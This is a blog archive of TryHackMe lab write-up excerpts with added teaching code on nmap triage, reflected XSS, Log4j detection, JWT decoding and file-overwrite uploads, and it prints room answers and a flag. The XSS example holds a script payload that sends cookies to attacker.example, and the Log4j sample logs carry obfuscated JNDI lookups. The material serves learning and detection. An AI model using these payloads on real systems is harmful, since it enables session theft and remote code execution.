Category Archives: THM Write Up
Common Linux Privilege Escalation
Used room: https://tryhackme.com/room/commonlinuxprivesc
Privilege escalation is largely a matter of practice. It mostly depends on configuration choices in the system that act as weaknesses through which privileges can be escalated. These misconfigurations come in many forms, for example: So, in this post we will look at various methods of privilege escalation on Linux. Step 1: Enumerate the machine… Continue reading "Common Linux Privilege Escalation"
Net Sec Challenge
What is the highest port number being open less than 10,000? Answer: 8080
There is an open port outside the common 1000 ports; it is above 10,000. What is it? Answer: 10021
How many TCP ports are open? Answer: 6
What is the flag hidden in the HTTP server header? Answer: THM{web_server_25352}
What is the flag hidden in the… Continue reading "Net Sec Challenge"
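Answering those first three questions by eye works for one host, but a saved scan can be triaged programmatically. The following is an added example, not part of the write-up: it parses nmap grepable (-oG) output and reports the highest open port below 10,000, the open ports above it, and the open TCP count. The scan text is constructed for a hypothetical host and shaped to give the same answers as the room (8080, 10021, 6); it is not a real capture.

```python
"""Triage of an nmap grepable (-oG) scan.

Added example (not part of the write-up).  SAMPLE_GNMAP is a constructed
file for a hypothetical host, not a real capture.
"""
from typing import Dict, List, Optional, Tuple

SAMPLE_GNMAP = """\
# Nmap 7.93 scan initiated as: nmap -sS -p- -oG scan.gnmap 10.10.0.5
Host: 10.10.0.5 ()\tStatus: Up
Host: 10.10.0.5 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 8080/open/tcp//http-proxy///, 10021/open/tcp//unknown///, 10022/filtered/tcp//unknown///\tIgnored State: closed (65528)
# Nmap done -- 1 IP address (1 host up) scanned
"""

Port = Tuple[int, str, str]  # (number, protocol, service name)


def parse_open_ports(gnmap: str) -> List[Port]:
    """Extract every port nmap reported as 'open' from -oG output.

    Each entry in the Ports: field is
    port/state/protocol/owner/service/rpc/version/ ; only state == open
    counts, so filtered and open|filtered ports are left out.
    """
    found: List[Port] = []
    for line in gnmap.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        # The Ports: field runs up to the next tab-separated field.
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for entry in ports_field.split(","):
            fields = entry.strip().split("/")
            if len(fields) < 5:
                continue  # malformed entry: skip rather than crash
            number, state, proto, service = fields[0], fields[1], fields[2], fields[4]
            if state == "open":
                found.append((int(number), proto, service))
    return sorted(found)


def highest_open_below(ports: List[Port], limit: int) -> Optional[int]:
    """Highest open port number strictly below limit (None if there is none)."""
    return max((p for p, _, _ in ports if p < limit), default=None)


def open_above(ports: List[Port], limit: int) -> List[int]:
    """All open port numbers strictly above limit, ascending."""
    return [p for p, _, _ in ports if p > limit]


def count_open(ports: List[Port], proto: str = "tcp") -> int:
    """Number of open ports for one protocol."""
    return sum(1 for _, pr, _ in ports if pr == proto)


def triage(gnmap: str, split_at: int = 10000) -> Dict[str, object]:
    """Answer the three enumeration questions for one scan."""
    ports = parse_open_ports(gnmap)
    return {
        "highest_below": highest_open_below(ports, split_at),
        "above": open_above(ports, split_at),
        "open_tcp": count_open(ports, "tcp"),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_GNMAP))
```

The parser keys on the state field rather than on the port number, so a port nmap lists as filtered (10022 in the sample) is not counted as open, which is the mistake that usually produces an off-by-one answer to "how many TCP ports are open".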
Cross-site Scripting
Cross-site scripting (XSS) is an injection attack in which malicious JavaScript is injected into a web application with the intention that it executes in the browsers of other users. Types of XSS: reflected XSS, stored XSS, DOM-based XSS and blind XSS. Reflected XSS happens when user-supplied data in an HTTP request is included in the webpage source without any… Continue reading "Cross-site Scripting"
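To make the reflected case concrete, here is an added example (not code from the write-up or from any real application) of a server-side search page that echoes the q parameter back into the page. The vulnerable renderer concatenates request data into HTML; the fixed one HTML-encodes it first. The search URL, the parameter name and the attacker host are hypothetical.

```python
"""Reflected XSS: an unescaped echo beside the escaped fix.

Added example, not from the write-up.  The search page, its ?q= parameter
and the attacker host are hypothetical placeholders.
"""
import html
from urllib.parse import parse_qs, urlsplit

# A link an attacker would send to a victim (constructed).  The query is a
# URL-encoded <script> that ships document.cookie to the attacker's server.
PAYLOAD_URL = (
    "http://shop.example/search?q="
    "%3Cscript%3Enew%20Image%28%29.src%3D%27http%3A%2F%2Fattacker.example%2Fc%3F%27"
    "%2Bdocument.cookie%3C%2Fscript%3E"
)


def query_param(url: str, name: str = "q") -> str:
    """Return the percent-decoded value of one query parameter ('' if absent)."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_results_unsafe(query: str) -> str:
    """Vulnerable: request data is dropped straight into the page source, so a
    <script> in the query becomes a script the victim's browser executes."""
    return f"<h2>Results for: {query}</h2>"


def render_results_safe(query: str) -> str:
    """Fixed: HTML-encode before emitting into element text.

    html.escape is the right encoding for text content and quoted attribute
    values only; a value placed inside a <script> block or an unquoted
    attribute needs context-specific encoding instead.
    """
    return f"<h2>Results for: {html.escape(query, quote=True)}</h2>"


def has_script_tag(page: str) -> bool:
    """Crude oracle for the demo: does the response carry a live <script> tag?"""
    return "<script>" in page.lower()


if __name__ == "__main__":
    q = query_param(PAYLOAD_URL)
    print("unsafe:", render_results_unsafe(q))
    print("safe:  ", render_results_safe(q))
```

Both responses contain the attacker's text; the difference is that in the safe version the browser sees &lt;script&gt; as literal characters to display rather than a tag to execute. Because the payload travels in the request and the page does not store it, this is the reflected variant: only whoever follows the link is affected.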
Understanding Log4j
What is Log4j? Log4j is a Java logging library, part of the Apache Logging Services project, used to capture logs. Almost everything you do on the internet becomes an event that is captured in a log, and your inputs are captured in those logs too. Your application is vulnerable if it logs a user's… Continue reading "Understanding Log4j"
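Since the risk is that logged user input gets interpreted, the practical detection question is whether a logged string contains a JNDI lookup. The following added example (not from the write-up) scans constructed access-log lines for ${jndi: and, because attackers hide it behind nested lookups such as ${lower:j} or ${::-j} and behind URL encoding, collapses those first. The log lines and hostnames are constructed placeholders.

```python
"""Spot Log4Shell-style JNDI lookups in log lines, including obfuscated ones.

Added example, not from the write-up.  A vulnerable Log4j 2 resolves
${...} lookups inside logged strings, so the marker to hunt for is
${jndi: ; the normaliser below undoes the usual obfuscations before
matching.  SAMPLE_LINES are constructed, not real traffic.
"""
import re
from typing import List, Tuple
from urllib.parse import unquote

# ${lower:x} / ${upper:x} -> x   (case is flattened at the end anyway)
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${anything:-x} -> x ; covers ${::-j} as well as ${env:UNSET:-j}
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Percent-decode, then collapse innermost lookups until nothing changes."""
    text = unquote(text)
    for _ in range(max_rounds):  # bounded: real payload nesting is shallow
        folded = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        folded = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), folded)
        if folded == text:
            break
        text = folded
    return text.lower()


def is_jndi_lookup(line: str) -> bool:
    """True when the line, once de-obfuscated, contains a JNDI lookup."""
    return "${jndi:" in normalize_lookups(line)


SAMPLE_LINES = [  # constructed Apache-style lines: client, time, request, status, user agent
    '10.0.0.7 - - [10/Dec/2021:13:01:02 +0000] "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:13:02:10 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:13:02:11 +0000] "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://attacker.example/b}"',
    '10.0.0.9 - - [10/Dec/2021:13:02:12 +0000] "GET /?x=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3Armi%3A%2F%2Fattacker.example%2Fo%7D HTTP/1.1" 200 "curl/7.68"',
    '10.0.0.3 - - [10/Dec/2021:13:03:00 +0000] "GET /health HTTP/1.1" 200 "${java:version} probe"',
]


def scan_log(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (1-based line number, normalised text) for each suspicious line."""
    return [(n, normalize_lookups(line)) for n, line in enumerate(lines, 1) if is_jndi_lookup(line)]


if __name__ == "__main__":
    for n, text in scan_log(SAMPLE_LINES):
        print(n, text)
```

The last sample line carries a ${java:version} lookup, which is a lookup but not a JNDI one, and is left alone; matching on bare ${ would flag it and everything else that legitimately uses Log4j lookups. Note that this only finds payloads in whatever the front-end logged; input that reached a Java application through another channel needs the same check applied to that application's own logs.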
Tryhackme – Kenobi
Scan the machine with nmap, how many ports are open? Answer: 7
Enumerating Samba for shares: nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.203.136
Using the nmap command above, how many shares have been found? Answer: 3
On most distributions of Linux smbclient is already installed. Let's inspect one of the shares: smbclient //<ip>/anonymous
Using your machine, connect… Continue reading "Tryhackme – Kenobi"
OWASP Juice Shop
Day 1 Task – Injection
Question #1: Log into the administrator account!
Capture the request and change the parameters. Click on the Send button. See the response in the browser. The token used is a JWT, which can easily be decoded on jwt.io. After decoding you get the password. Log in with the credentials. Here is your flag.… Continue reading "OWASP Juice Shop"
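The reason jwt.io can show the token's contents without any key is that a JWT's header and payload are just base64url-encoded JSON; only the third segment, the signature, needs the secret. The added example below (not the room's or Juice Shop's code) issues an HS256 token, decodes it without the secret the way jwt.io does, and then shows that swapping the payload leaves a token that still decodes but fails verification. The secret, claims and e-mail address are constructed placeholders.

```python
"""Decoding a JWT without its secret, versus verifying it.

Added example, not from the write-up.  DEMO_SECRET and DEMO_CLAIMS are
constructed placeholders, not Juice Shop's real values.
"""
import base64
import hashlib
import hmac
import json
from typing import Any, Dict, Tuple


def b64url_encode(raw: bytes) -> str:
    """JWT base64url: URL-safe alphabet, padding stripped."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    """Restore the padding the token dropped, then decode."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _dump(obj: Dict[str, Any]) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def make_hs256_token(payload: Dict[str, Any], secret: str) -> str:
    """Issue a token the way a server using HS256 would."""
    signing_input = f"{_dump({'alg': 'HS256', 'typ': 'JWT'})}.{_dump(payload)}"
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def decode_unverified(token: str) -> Tuple[Dict[str, Any], Dict[str, Any]]:
    """What jwt.io's decoder does: read header and payload, ignore the signature."""
    header_b64, payload_b64, _sig = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))


def verify_hs256(token: str, secret: str) -> bool:
    """Recompute the HMAC over header.payload and compare in constant time."""
    parts = token.split(".")
    if len(parts) != 3:
        return False
    header_b64, payload_b64, sig_b64 = parts
    expected = hmac.new(secret.encode(), f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(sig_b64))


def forge_payload(token: str, new_payload: Dict[str, Any]) -> str:
    """Swap the payload but keep the old signature: decodes fine, fails verification."""
    header_b64, _old_payload, sig_b64 = token.split(".")
    return f"{header_b64}.{_dump(new_payload)}.{sig_b64}"


# Constructed demo values (placeholders, not real application data).
DEMO_SECRET = "not-the-real-secret"
DEMO_CLAIMS = {"status": "success", "data": {"id": 1, "email": "admin@shop.example", "role": "admin"}}

if __name__ == "__main__":
    token = make_hs256_token(DEMO_CLAIMS, DEMO_SECRET)
    print(decode_unverified(token))
    print("valid:", verify_hs256(token, DEMO_SECRET))
```

The takeaway for the write-up's step is that whatever a server puts into the payload (here, the data the room uses to obtain a password) is readable by anyone holding the token, so a JWT is not a place for secrets; and, from the other side, a server that reads claims without calling the equivalent of verify_hs256 will accept the forged token.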
Hydra
What is Hydra? Hydra is an online brute-force password-cracking program: a quick system-login password 'hacking' tool. We can use Hydra to run through a wordlist and brute-force an authentication service. Imagine trying to guess someone's password manually on a particular service (SSH, a web application form, FTP or SNMP); we can use… Continue reading "Hydra"
Upload Vulnerabilities
Task 1 – Deploying Machine
Task 4 – Overwriting Existing Files
What is the name of the image file which can be overwritten? Answer – mountains.jpg
Overwrite the image. What is the flag you receive?
Step 1: Download a sample image. Step 2: Change the name of the image. Step 3: Now select the downloaded image to… Continue reading "Upload Vulnerabilities"
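The overwrite works because the server stores the upload under the name the client chose. The added example below (not the room's own code) shows an upload handler with that defect beside a hardened one that keeps only the extension, assigns a random server-side name and creates the file with O_EXCL so a collision fails instead of replacing anything. The directory, file names and byte contents are constructed for the demo.

```python
"""Overwriting an existing file through an upload form, and the fix.

Added example, not the room's own code.  The upload directory, file names
and file contents are constructed; the scenario mirrors Task 4, where an
upload named mountains.jpg replaces the site's mountains.jpg.
"""
import os
import secrets
import tempfile
from pathlib import Path
from typing import Dict

ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}


def save_upload_vulnerable(upload_dir: str, client_filename: str, data: bytes) -> Path:
    """Vulnerable: trusts the client-supplied name, so an upload with the same
    name silently replaces the existing file (and a name containing ../ walks
    out of upload_dir altogether)."""
    dest = Path(upload_dir) / client_filename
    dest.write_bytes(data)
    return dest


def save_upload_hardened(upload_dir: str, client_filename: str, data: bytes) -> Path:
    """Fixed: keep only the extension, choose a random server-side name, and
    open with O_EXCL so an unexpected collision raises instead of overwriting."""
    ext = Path(client_filename).suffix.lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"extension not allowed: {ext!r}")
    dest = Path(upload_dir) / f"{secrets.token_hex(16)}{ext}"
    fd = os.open(dest, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return dest


def demo() -> Dict[str, bool]:
    """Run both handlers against a pre-existing mountains.jpg in a temp dir."""
    original = b"ORIGINAL IMAGE BYTES"   # constructed stand-in for the real image
    malicious = b"ATTACKER BYTES"        # constructed upload body
    with tempfile.TemporaryDirectory() as d:
        existing = Path(d) / "mountains.jpg"
        existing.write_bytes(original)

        save_upload_vulnerable(d, "mountains.jpg", malicious)
        vulnerable_overwrote = existing.read_bytes() == malicious

        existing.write_bytes(original)  # restore before trying the fixed handler
        stored = save_upload_hardened(d, "mountains.jpg", malicious)
        return {
            "vulnerable_overwrote": vulnerable_overwrote,
            "hardened_kept_original": existing.read_bytes() == original,
            "hardened_used_new_name": stored.exists() and stored.name != "mountains.jpg",
        }


if __name__ == "__main__":
    print(demo())
```

Renaming on the server also removes the attacker's control over where the file lands, which is the same property that stops path traversal through the filename. The extension allow-list here only checks the name; whether the bytes really are an image is a separate check the example does not make.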
Metasploit Framework
Metasploit, an open-source penetration testing framework, is a powerful tool used by security engineers around the world. Maintained by Rapid7, Metasploit is a collection not only of thoroughly tested exploits but also of auxiliary and post-exploitation tools. Throughout this room we will explore the basics of using this massive framework and a few of the… Continue reading "Metasploit Framework"
Basic Pentesting
Task 1 – Web App Testing and Privilege Escalation
In this set of tasks you'll learn the following: brute forcing, hash cracking, service enumeration and Linux enumeration. The main goal here is to learn as much as possible.
Find the services exposed by the machine: use nmap to find out what services are running on the… Continue reading "Basic Pentesting"
